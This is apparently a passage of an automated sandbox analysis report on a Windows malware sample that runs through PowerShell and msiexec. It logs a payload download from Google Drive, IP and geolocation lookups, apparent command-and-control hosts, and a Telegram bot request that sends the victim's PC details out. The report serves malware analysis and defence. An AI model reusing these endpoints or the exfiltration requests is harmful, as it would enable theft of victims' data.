          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.9:49694 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:701188%0D%0ADate%20and%20Time:%2009/03/2025%20/%2019:27:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20701188%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 19:53:00 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: powershell.exe, 00000001.00000002.1195833009.0000000007A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.miK
          Source: powershell.exe, 00000001.00000002.1188632977.0000000003459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
          Source: svchost.exe, 00000004.00000002.2182166036.0000020CE8000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
          Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: 4PYRGCo1Di.exe, 4PYRGCo1Di.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000001.00000002.1192079621.00000000062A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000001.00000002.1189296404.0000000005395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000001.00000002.1189296404.0000000005395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000001.00000002.1189296404.0000000005241000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000001.00000002.1189296404.0000000005395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: powershell.exe, 00000001.00000002.1188632977.0000000003459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICE
          Source: powershell.exe, 00000001.00000002.1189296404.0000000005395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000001.00000002.1205281863.0000000008BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co%
          Source: msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
          Source: powershell.exe, 00000001.00000002.1189296404.0000000005241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBAr
          Source: powershell.exe, 00000001.00000002.1189296404.0000000005395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:701188%0D%0ADate%20a
          Source: msiexec.exe, 00000003.00000003.1281808168.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1284533057.00000000047DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: msiexec.exe, 00000003.00000002.2196040915.0000000021253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: msiexec.exe, 00000003.00000002.2196040915.0000000021253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020323000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020323000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
          Source: msiexec.exe, 00000003.00000002.2193215280.000000002031E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBAr
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enpF
          Source: powershell.exe, 00000001.00000002.1192079621.00000000062A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000001.00000002.1192079621.00000000062A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000001.00000002.1192079621.00000000062A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: msiexec.exe, 00000003.00000002.2179525179.000000000472A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: msiexec.exe, 00000003.00000002.2179525179.000000000472A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2192279455.000000001F810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT-
          Source: msiexec.exe, 00000003.00000002.2179525179.000000000472A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT-r
          Source: msiexec.exe, 00000003.00000003.1341273439.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2179525179.00000000047B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: msiexec.exe, 00000003.00000003.1341273439.00000000047A0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2179525179.0000000004788000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2179525179.000000000476E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT-&export=download
          Source: msiexec.exe, 00000003.00000003.1341273439.00000000047A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT-&export=downloadoo
          Source: msiexec.exe, 00000003.00000003.1341273439.00000000047A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT-&export=downloadtA
          Source: msiexec.exe, 00000003.00000003.1341273439.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2179525179.00000000047B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/t
          Source: msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: msiexec.exe, 00000003.00000002.2196040915.0000000021253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
          Source: msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
          Source: svchost.exe, 00000004.00000003.1203603033.0000020CE7E60000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
          Source: msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
          Source: powershell.exe, 00000001.00000002.1189296404.0000000005395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000001.00000002.1188632977.0000000003418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5f
          Source: powershell.exe, 00000001.00000002.1192079621.00000000062A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020278000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2193215280.000000002024F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2193215280.00000000201DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: msiexec.exe, 00000003.00000002.2193215280.00000000201DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: msiexec.exe, 00000003.00000002.2193215280.00000000201DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020278000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2193215280.000000002024F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2193215280.0000000020209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: msiexec.exe, 00000003.00000003.1281808168.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1284533057.00000000047DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: msiexec.exe, 00000003.00000002.2196040915.0000000021253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20Y&
          Source: msiexec.exe, 00000003.00000003.1281808168.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1284533057.00000000047DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: msiexec.exe, 00000003.00000003.1281808168.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1284533057.00000000047DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: msiexec.exe, 00000003.00000002.2196040915.0000000021253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
          Source: msiexec.exe, 00000003.00000003.1281808168.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1284533057.00000000047DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: msiexec.exe, 00000003.00000003.1281808168.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1284533057.00000000047DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020354000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2193215280.0000000020345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
          Source: msiexec.exe, 00000003.00000002.2193215280.000000002034F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBAr
          Source: msiexec.exe, 00000003.00000002.2193215280.0000000020345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/pF
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
          Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
          Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
          Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
          Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.9:49687 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.9:49690 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49710 version: TLS 1.2
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeCode function: 0_2_00405582 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405582

          System Summary

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Uncrude\4PYRGCo1Di.exeJump to dropped file
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeCode function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040348F
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeCode function: 0_2_00406AFA0_2_00406AFA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07C9BED61_2_07C9BED6
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08F600401_2_08F60040
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08F652D01_2_08F652D0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08F652C01_2_08F652C0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08F687781_2_08F68778
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0287D2783_2_0287D278
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_028753703_2_02875370
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0287C1473_2_0287C147
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0287C7383_2_0287C738
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0287C4683_2_0287C468
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0287CA083_2_0287CA08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0287E9883_2_0287E988
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_02873E093_2_02873E09
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0287CFAA3_2_0287CFAA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0287CCD83_2_0287CCD8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_028739EF3_2_028739EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_028729EC3_2_028729EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0287F9743_2_0287F974
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0287E97A3_2_0287E97A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_02876FC83_2_02876FC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_02879DE03_2_02879DE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046B18503_2_046B1850
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046B9D383_2_046B9D38
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BCDC03_2_046BCDC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046B96683_2_046B9668
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046B2A903_2_046B2A90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046B1FA83_2_046B1FA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BF0713_2_046BF071
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046B18413_2_046B1841
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046B00403_2_046B0040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BEC283_2_046BEC28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BEC183_2_046BEC18
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046B00133_2_046B0013
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046B8CC03_2_046B8CC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BF4D83_2_046BF4D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046B8CB13_2_046B8CB1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BF0803_2_046BF080
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046B51483_2_046B5148
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BF9223_2_046BF922
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046B51383_2_046B5138
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BF9303_2_046BF930
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BD6603_2_046BD660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BD6703_2_046BD670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BD2183_2_046BD218
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BDAC83_2_046BDAC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BDAB93_2_046BDAB9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BE36A3_2_046BE36A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BE3783_2_046BE378
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BDF203_2_046BDF20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046B0B203_2_046B0B20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046B0B303_2_046B0B30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BDF1F3_2_046BDF1F
